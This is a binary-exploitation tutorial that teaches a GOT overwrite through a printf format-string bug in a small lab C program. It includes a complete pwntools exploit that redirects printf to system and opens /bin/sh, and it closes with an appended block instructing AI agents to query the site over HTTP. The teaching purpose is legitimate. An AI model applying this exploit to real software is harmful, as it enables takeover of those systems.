# Exploiting a GOT overwrite ## Source {% file src="/files/-MGdeGPzo1WBhizlJhze" %} GOT Overwrite - 32-bit {% endfile %} The very simplest of possible GOT-overwrite binaries. ```c #include void vuln() { char buffer[300]; while(1) { fgets(buffer, sizeof(buffer), stdin); printf(buffer); puts(""); } } int main() { vuln(); return 0; } ``` Infinite loop which takes in your input and prints it out to you using `printf` - no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :) ## Exploitation As per usual, set it all up ```python from pwn import * elf = context.binary = ELF('./got_overwrite-32') libc = elf.libc libc.address = 0xf7dc2000 # ASLR disabled p = process() ``` Now, to do the `%n` overwrite, we need to find the offset until we start reading the buffer. ``` $ ./got_overwrite %p %p %p %p %p %p 0x12c 0xf7fa7580 0x8049191 0x340 0x25207025 0x70252070 ``` Looks like it's the 5th. ``` $./got_overwrite %5$p 0x70243525 ``` Yes it is! ```python payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']}) p.sendline(payload) p.clean() p.interactive() ``` Now, next time `printf` gets called on your input it'll actually be `system`! If the buffer is restrictive, you can always send `/bin/sh` to get you into a shell and run longer commands. ### Final Exploit ```python from pwn import * elf = context.binary = ELF('./got_overwrite-32') libc = elf.libc libc.address = 0xf7dc2000 # ASLR disabled p = process() payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']}) p.sendline(payload) p.clean() p.sendline('/bin/sh') p.interactive() ``` ## 64-bit You'll never guess. That's right! You can do this one by yourself. {% file src="/files/-MGdeK\_6u6Yiu08bGMNL" %} GOT Overwrite - 64-bit {% endfile %} ## ASLR Enabled If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously. {% file src="/files/-MGdeNzszYLApmwgmpqn" %} GOT Overwrite - ASLR Exploit Scripts {% endfile %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ir0nstone.gitbook.io/notes/binexp/stack/got-overwrite/exploiting-a-got-overwrite.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.